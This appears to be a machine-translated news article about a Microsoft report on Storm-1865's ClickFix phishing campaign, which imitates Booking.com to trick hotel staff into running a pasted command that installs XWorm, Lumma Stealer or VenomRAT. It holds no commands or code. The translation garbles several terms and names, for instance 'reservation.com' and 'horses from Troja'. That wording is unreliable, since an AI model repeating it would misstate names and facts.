- Microsoft warns against a new imitant phishing campaign Booking.com
- It targets companies in the hotel industry
- The objective is to deploy infosteralists and horses from Troja
Hotels, seaside resorts and other hotel industry companies are targeted with a sophisticated click phishing campaign that imitates Booking.com.
A new report by Microsoft Threat Intelligence claims that the phishing campaign is “rapidly evolving” and targeting businesses around the world.
The objective of the campaign is to steal the payment of people and personal data, which could lead to wire fraud and reputation damage to victims’ organizations.
Storm-1865
First of all, the attackers create a notification email on the theme of the reservation.com, discussing things like the criticisms of the guests or the account checks. Companies that do not identify the scam are then redirected to a false puzzle Captcha, and if they solve it, are invited to an error message. This false error message is also delivered with a solution, which includes the copy of an order and paste it / execute it in the execution program.
Instead of solving the problem, the program execution downloads one of the multiple strains of malware used in this campaign: XWORM, Lumma Stealer or Venomrat. These are different types of malware with different features.
While Venomrat, for example, is a Trojan horse for remote access which gives attackers tirelessly access to victim devices, Lumma is an infostector that enters connection identification information and other secrets stored in the web browser and elsewhere on the device.
Microsoft assigned the campaign to a threat actor he follows as Storm-1865, a group without previous record. The campaign apparently started in December 2024, and there is no information on the number of companies – if necessary – which were prey to it.
Clickfix Fraud has become more popular lately, and Techradar Pro has already reported several times this year. This is an evolution of the old scam “IT technician”, in which a victim is served a popup imitating a company deemed saying that his computer is broken / infected.
The Popup shares a phone number that the victim can call, to speak to a computer technician and solve the problem. The “technician” ends up installing malware.
Although the scams by phone are always very lively, the Clickfix campaign focuses mainly on the victim doing most of the work, installing malware through a less obvious process (collaborating an order in execution).
